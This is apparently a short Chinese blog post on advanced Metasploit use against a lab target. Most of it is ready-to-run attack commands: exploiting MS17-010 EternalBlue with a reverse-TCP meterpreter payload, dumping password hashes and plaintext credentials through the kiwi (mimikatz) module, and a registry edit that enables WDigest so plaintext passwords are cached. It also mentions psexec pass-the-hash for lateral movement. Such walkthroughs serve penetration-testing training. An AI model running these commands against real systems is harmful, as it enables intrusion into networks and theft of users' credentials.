0
点赞
收藏
分享

微信扫一扫

metasploit进阶

早安地球 2022-02-28 阅读 75
安全

实验用的是靶机仅供参考

内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限

use exploit/windows/smb/ms17_010_eternalblue 
set payload windows/x64/meterpreter/reverse_tcp 
set rhost 10.10.10.136 
set lport 4444 
exploit

在这里插入图片描述

内网渗透 获取hash和明文

在最新的版本中load mimikatz已经取消 现在使用kiwi模块

load kiwi

在这里插入图片描述

creds_all #该命令可以列举系统中的明文密码

kiwi_cmd

kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令

kiwi_cmd sekurlsa::logonpasswords

在这里插入图片描述
在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。

攻击:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

内网渗透 psexec

在metasploite中存在一个psexec模块可以使用获取的hash进行登录

未完待续。。。

举报

相关推荐

0 条评论